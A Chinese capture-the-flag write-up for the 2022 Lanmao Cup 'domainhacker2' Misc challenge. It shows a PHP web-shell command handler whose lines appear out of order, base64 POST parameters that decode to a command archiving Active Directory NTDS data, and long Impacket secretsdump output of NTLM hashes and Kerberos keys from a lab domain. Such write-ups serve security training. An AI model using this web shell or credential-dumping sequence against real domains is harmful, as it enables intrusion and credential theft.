CTF-2022 蓝帽杯-Misc-domainhacker2
作者:互联网
附件
链接:https://pan.baidu.com/s/1q-9HIdbsARa81dAGXgdpJQ?pwd=msjz
提取码:msjz
思路
与domainhacker一致
<?php
$ret=@runcmd($r." 2>&1");
$r="{$p} {$c}";
$p=base64_decode(substr($_POST["i00fdbe370f732"],2));
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$s=base64_decode(substr($_POST["eaf06745bcdc2e"],2));
i00fdbe370f732=LcY21k
eaf06745bcdc2e=suY2QgL2QgImM6XFxXaW5kb3dzXFxUZW1wIiZyYXIuZXhlIGEgLVBGYWtlUGFzc3dvcmQxMjMkIG50ZHMucmFyIG5ldyZlY2hvIDFkMzYzMiZjZCZlY2hvIDc4YmM0NjJhYg==
解压缩打开ntds.rar后,使用secretsdump提取出信息即可
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0xf5a55bb9181f33269276949d2ad680e5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 752aa10b88b269bd735d54b802d5c86c
[*] Reading and decrypting hashes from ./ntds/new/Active Directory/ntds.dit
test.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a85016dddda9fe5a980272af8f54f20e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
test:1003:aad3b435b51404eeaad3b435b51404ee:4f95f1c5acfc3b972a1ce2a29ef1f1c5:::
PDC$:1004:aad3b435b51404eeaad3b435b51404ee:416f89c3a5deb1d398a1a1fce93862a7:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8d9c46df1a433693842082203898424f:::
EXCHANGE$:1107:aad3b435b51404eeaad3b435b51404ee:8f203498c3054ed0e01efc9d1da10ecd:::
test.local\$731000-68GJ1H3VU01P:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_96e3b8005d5c4140a:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_2e01c85cf3c346a3b:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_70dd52fc546d40e69:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_232124d96e734743a:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_5cbb0f422e264c8a9:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_8795fe36df7a4bf6b:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_c5b767869d8842e5a:1134:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_c648e6ab382f45d1b:1135:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_728e72cf36894b339:1136:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\HealthMailbox2b984a7:1138:aad3b435b51404eeaad3b435b51404ee:90fcf26701d2940adc23490f350e1b1f:::
test.local\HealthMailbox5df812c:1139:aad3b435b51404eeaad3b435b51404ee:ad1b5c6c9f429b9d8da03b2f513bfb21:::
test.local\HealthMailbox3b3738b:1140:aad3b435b51404eeaad3b435b51404ee:5ae4cbd737c56ae1200e27f1613152ef:::
test.local\HealthMailbox92ad4b5:1141:aad3b435b51404eeaad3b435b51404ee:8a72893d2524ec7250665dc774309ef0:::
test.local\HealthMailbox32c7bf8:1142:aad3b435b51404eeaad3b435b51404ee:a6da9aacd86610c09b8092fc80b828d0:::
test.local\HealthMailbox57b62f5:1143:aad3b435b51404eeaad3b435b51404ee:32fa33f6fce1c88d17b0f2461ddc14bf:::
test.local\HealthMailbox18342c7:1144:aad3b435b51404eeaad3b435b51404ee:0ac5b6fd8216905ce1bf6c8728a03eac:::
test.local\HealthMailbox2d4e04f:1145:aad3b435b51404eeaad3b435b51404ee:42b6fb14d0650f80148d5a20dc12f77e:::
test.local\HealthMailbox247d46e:1146:aad3b435b51404eeaad3b435b51404ee:d403e27a987b8bc0e56c74ea4b337d09:::
test.local\HealthMailbox364422e:1147:aad3b435b51404eeaad3b435b51404ee:38716e3d1eabfc27eeffc559d0dffbef:::
test.local\HealthMailboxd9284e9:1148:aad3b435b51404eeaad3b435b51404ee:a355b106550b9ac7871ed534b101a1f6:::
test1:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
SDC$:1151:aad3b435b51404eeaad3b435b51404ee:9f40caf799bf0d110fdf08b3bf3eb6c0:::
testnew$:1152:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WIN-PJ6ELFEG09P$:1153:aad3b435b51404eeaad3b435b51404ee:6533cba50e01cace16567ec5691e587f:::
testcomputer$:1154:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
t$:1155:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
tt$:1156:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WebApp01$:1157:aad3b435b51404eeaad3b435b51404ee:b021fa4e92913d91a6eade97884f508b:::
aaa:1158:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
[*] Kerberos keys from ./ntds/new/Active Directory/ntds.dit
test.local\Administrator:aes256-cts-hmac-sha1-96:bf735a3948b1284821574a0044a703548465e61057dd1a7768325e8aad06ae5e
test.local\Administrator:aes128-cts-hmac-sha1-96:bd93e3242d1a346f4d2280ac3c33f965
test.local\Administrator:des-cbc-md5:1f4cef4cabf20298
Admin:aes256-cts-hmac-sha1-96:f3ee9e3911e4dcbd686dc73b2a70c6d7762fff9ffeb304d62410b5f2464a5884
Admin:aes128-cts-hmac-sha1-96:40877736a0a837a3b9563fd4f12e72f5
Admin:des-cbc-md5:cddcea70e6a4c29d
test:aes256-cts-hmac-sha1-96:3a4b7dc7e441d73726adbb1921e79ba65a8895d74887e04df9eaef3869207ee9
test:aes128-cts-hmac-sha1-96:98bf9049e7f51e8e7d8f461aa8d9ec70
test:des-cbc-md5:e3986db31051c154
PDC$:aes256-cts-hmac-sha1-96:3a1cff1c3cbbc08e6c4014cc629f2a3d8a31b6dec5759f6f0859d0bfe6506182
PDC$:aes128-cts-hmac-sha1-96:05de7789ce4233c3fb1117b864cd8644
PDC$:des-cbc-md5:9dadcb61688a2367
krbtgt:aes256-cts-hmac-sha1-96:ce69418e93cd64b771e562ac73ae00b9922fe6c83fa1e82219400e2bb48ed400
krbtgt:aes128-cts-hmac-sha1-96:319f7c87ba483f25f5e4f7b2ee0cf6c1
krbtgt:des-cbc-md5:8a264ad932f23704
EXCHANGE$:aes256-cts-hmac-sha1-96:7998677a5c8ad1934b5a6043b9ffb4e7141412fce5a82358164d26b0b4b0d96a
EXCHANGE$:aes128-cts-hmac-sha1-96:258731ffd04a5d78912db56def015af5
EXCHANGE$:des-cbc-md5:0d10f88043bff491
test.local\HealthMailbox2b984a7:aes256-cts-hmac-sha1-96:2e2c606999ae65c838190eb3e42f268ff2c9e05b562057f4372052e5c418b141
test.local\HealthMailbox2b984a7:aes128-cts-hmac-sha1-96:d496728ddbcd54d5246033fc1e59b191
test.local\HealthMailbox2b984a7:des-cbc-md5:6423fe5eb3b354ce
test.local\HealthMailbox5df812c:aes256-cts-hmac-sha1-96:c7b35baa2d7c75dd729061c98a91262c674068ab46767da9549aa5bc9e0800c7
test.local\HealthMailbox5df812c:aes128-cts-hmac-sha1-96:4c60e6d2265f79ba7578d9e27479dfbf
test.local\HealthMailbox5df812c:des-cbc-md5:b94cb3ba0d927691
test.local\HealthMailbox3b3738b:aes256-cts-hmac-sha1-96:6b463387e784265bde6ea1a73c553d6e8cfe12b22fb1fe0439dd4ccba6784306
test.local\HealthMailbox3b3738b:aes128-cts-hmac-sha1-96:a36192139b393b469db8ecc4401bb5ba
test.local\HealthMailbox3b3738b:des-cbc-md5:ad43043d623eb040
test.local\HealthMailbox92ad4b5:aes256-cts-hmac-sha1-96:2a757f18b3b8d02f9980f9dda081a524e865b2d3a531dcb3c5c146e1cbd7d55a
test.local\HealthMailbox92ad4b5:aes128-cts-hmac-sha1-96:968429cdd9464bcf9e0fde47b136447d
test.local\HealthMailbox92ad4b5:des-cbc-md5:4683e34ca74af710
test.local\HealthMailbox32c7bf8:aes256-cts-hmac-sha1-96:e95d8fd1c2920c19722892bf5e8dfa8846360994f4484c043b04eff000ecd14e
test.local\HealthMailbox32c7bf8:aes128-cts-hmac-sha1-96:1d61443a6254596bd8fb3d697221d710
test.local\HealthMailbox32c7bf8:des-cbc-md5:ef8a4f203e808501
test.local\HealthMailbox57b62f5:aes256-cts-hmac-sha1-96:1713fdd614d9cd173c0b2a54db2d52d013c803bf125584db2c3f163aeaf22c03
test.local\HealthMailbox57b62f5:aes128-cts-hmac-sha1-96:9390dcff5cc2227274a7148e798d0174
test.local\HealthMailbox57b62f5:des-cbc-md5:460d98a4204ab6f2
test.local\HealthMailbox18342c7:aes256-cts-hmac-sha1-96:887d6b5d170b1bac1372631e80a32a732d1ea8985239b48297392aa738a95300
test.local\HealthMailbox18342c7:aes128-cts-hmac-sha1-96:7646f506daa562e686d6c2aefc920b16
test.local\HealthMailbox18342c7:des-cbc-md5:3189bfa47c836d4f
test.local\HealthMailbox2d4e04f:aes256-cts-hmac-sha1-96:57afad1952342893df8277fcc66e8424c77fdedf7bcdc5fc10c1b9ad7e54bdf1
test.local\HealthMailbox2d4e04f:aes128-cts-hmac-sha1-96:1934ccdefa73b2d48f007a97f7720743
test.local\HealthMailbox2d4e04f:des-cbc-md5:15c464a7abb36e5e
test.local\HealthMailbox247d46e:aes256-cts-hmac-sha1-96:219f9c118ae6cc7217e0e3545e39e9bdfb6b207e7c91d8f35cad89bd1ec3ea8b
test.local\HealthMailbox247d46e:aes128-cts-hmac-sha1-96:10b8531f9555d0ecfcc7527d7bc90246
test.local\HealthMailbox247d46e:des-cbc-md5:d07525b029cb6d46
test.local\HealthMailbox364422e:aes256-cts-hmac-sha1-96:a96b346f39ace3cf939d1b8baba23d652405183300911133fae1929cd1869d05
test.local\HealthMailbox364422e:aes128-cts-hmac-sha1-96:5f081757425ad99ea78280bbd8102290
test.local\HealthMailbox364422e:des-cbc-md5:20b51cd623efd558
test.local\HealthMailboxd9284e9:aes256-cts-hmac-sha1-96:bbdb9ddc9c2317044a670859428947f69e082457f41f52e40ce8b05ab9cf79d4
test.local\HealthMailboxd9284e9:aes128-cts-hmac-sha1-96:9860afcea4db56c2c1fcf62a3f827e68
test.local\HealthMailboxd9284e9:des-cbc-md5:1aeaba45202a8fd9
test1:aes256-cts-hmac-sha1-96:255dc456b3fb5c7e0a30af8dc9a6848b2a52632df368848fbe3de66af02a4b39
test1:aes128-cts-hmac-sha1-96:79089681b69f42be4a848f5ba97089e9
test1:des-cbc-md5:f7ce86ba13d5974a
SDC$:aes256-cts-hmac-sha1-96:8ae566481e35184fbe4527e7dd1994ef578d1b2193902a0524d2d7eb521fc546
SDC$:aes128-cts-hmac-sha1-96:dbe510adea502b051456ab9b87b3dcc3
SDC$:des-cbc-md5:796d20cb864cda3e
testnew$:aes256-cts-hmac-sha1-96:3cb7277d0b9a55772d676b05b8e4fe1cef5cf2ac2a771b3694f8140cf251ced2
testnew$:aes128-cts-hmac-sha1-96:ff6f396cde3a83d0f92ba5c41c4398db
testnew$:des-cbc-md5:fbd37375d03e8fef
WIN-PJ6ELFEG09P$:aes256-cts-hmac-sha1-96:6ba5adb397e3b0745e8fc99ec1ef760765fabc72db61aac7fa85180b81255bbc
WIN-PJ6ELFEG09P$:aes128-cts-hmac-sha1-96:dd628a4f9010e06d9e28bdfbb05bba8a
WIN-PJ6ELFEG09P$:des-cbc-md5:85cee3a2e5a1a876
testcomputer$:aes256-cts-hmac-sha1-96:5aab1f9bd51d922662b0fb6629d2f19c021d39ce61ce3e1e0e78c30fe262323f
testcomputer$:aes128-cts-hmac-sha1-96:6d63db940d8a6184c819fe28a2bb941b
testcomputer$:des-cbc-md5:19c2a80d6e86c26b
t$:aes256-cts-hmac-sha1-96:2ecec9c280c2b5a9194a188347f574f978effb1a081788d18336008ff6d82301
t$:aes128-cts-hmac-sha1-96:8db3c242e61039c65cc4ec3e718b4f6e
t$:des-cbc-md5:bc15fd7a4fea73ba
tt$:aes256-cts-hmac-sha1-96:5e29f4025707d663a2f01a37be180eb16aefa1922f33746f884f54d3c3659662
tt$:aes128-cts-hmac-sha1-96:fcbe0e3fb7c4115dd587cf399d80ff8b
tt$:des-cbc-md5:8a153467f7dcba92
WebApp01$:aes256-cts-hmac-sha1-96:694654793ec838d03449774b13614c829cb67e098c6f49d54c2d106dd06f36f7
WebApp01$:aes128-cts-hmac-sha1-96:41dbcb4199062f8e5032c7c389f9671b
WebApp01$:des-cbc-md5:3efbe56e9246fb62
aaa:aes256-cts-hmac-sha1-96:fdca7a6a5d3697843ded80744f15a70492b941e5af1e91bf5ebd5f372a3ce6b4
aaa:aes128-cts-hmac-sha1-96:d853c22fb51e8d65f7eb84a07c7b5a9f
aaa:des-cbc-md5:0d572cfe46a41cf1
[*] Cleaning up...
标签:sha1,cts,Misc,CTF,test,domainhacker2,local,hmac,96 来源: https://www.cnblogs.com/zxcyyyyy000/p/16462928.html